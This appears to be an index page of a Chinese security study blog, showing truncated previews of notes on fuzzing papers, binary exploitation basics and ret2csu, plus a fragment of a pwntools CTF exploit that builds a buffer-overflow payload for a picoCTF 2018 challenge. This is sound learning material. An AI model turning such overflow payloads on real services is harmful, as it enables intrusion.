学习

Poste：机器人车辆传感器欺骗攻击的自动发现 摘要 在本文中，我们提出了一个新的传感器模糊框架SensorFuzz，它可以系统地发现机器人车辆...

文译名：profuzzer：实时输入类型探测，以更好地发现零日漏洞 作者：游伟 单位：普顿大学 国家： #美国 年份： #2019年 来源： #SP 关键字： #fuzzing 代...

![[刷题#2023.2.9 JarvisOJ fm]]

picoctf_2018_buffer overflow 2 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 from pwn import * from LibcSearcher import* # context(arch = 'amd64', os = 'linux', log_level = 'debug') context.log_level = 'debug' elf = ELF('./bin/PicoCTF_2018_buffer_overflow_2') p = remote('node4.buuoj.cn', 28842) # elf win = elf.symbols['win'] main_addr = elf.symbols['main'] a1 = 0x0DEADBEEF a2 = 0x0DEADC0DE print(p.recvline()) payload = b'a' * 0x6c...

「二进制安全pwn基础」 - 网安 知识点 [[静态链接栈溢出]] 如何将一个数转化为底层二进制的机器码，最简单的方式就是在IDA中直接看汇编 (80条...

参考：(67条消息) 中级ROP之ret2csu_西杭的博客-CSDN博客 适用场景 在我们想要调用系统调用，或者在 64 位程序中通过寄存器传递参数，...

中文译名：revery: 从概念验证到可利用 作者：Yan Wang 单位：IIE 国家： #中国 年份： #2018年 来源： #ccs 关键字： #AGE #fuzzing 代码地址： 笔记建立时间...

中文译名：不需要硬件设备和模拟器的语义驱动模糊 作者：Wenjia Zhao 单位：西安交通大学 国家： #中国 年份： #2022年 来源： #NDSS会议 关键字...

中文译名：SemFuzz:基于语义的概念验证漏洞自动生成 作者：wei you btw 二作和三作是 IIE，三作是陈凯 单位：印第安纳大学伯明顿分校 国家： #美...

information source common vulnerabilities and exposures (CVE) systems CVE - CVE (mitre.org) Linux git logs CVE - CVE (mitre.org) bug descriptions posted on forums and blogs SEMANTIC INFORMATION RETRIEVING NLP tool process these information, output calling sequence. so, fuzzer utilizes the sequences to guidline the fuzz this part i want know how the fuzzer use these sequences, how two prune the unreachable path I noticed that the example both have...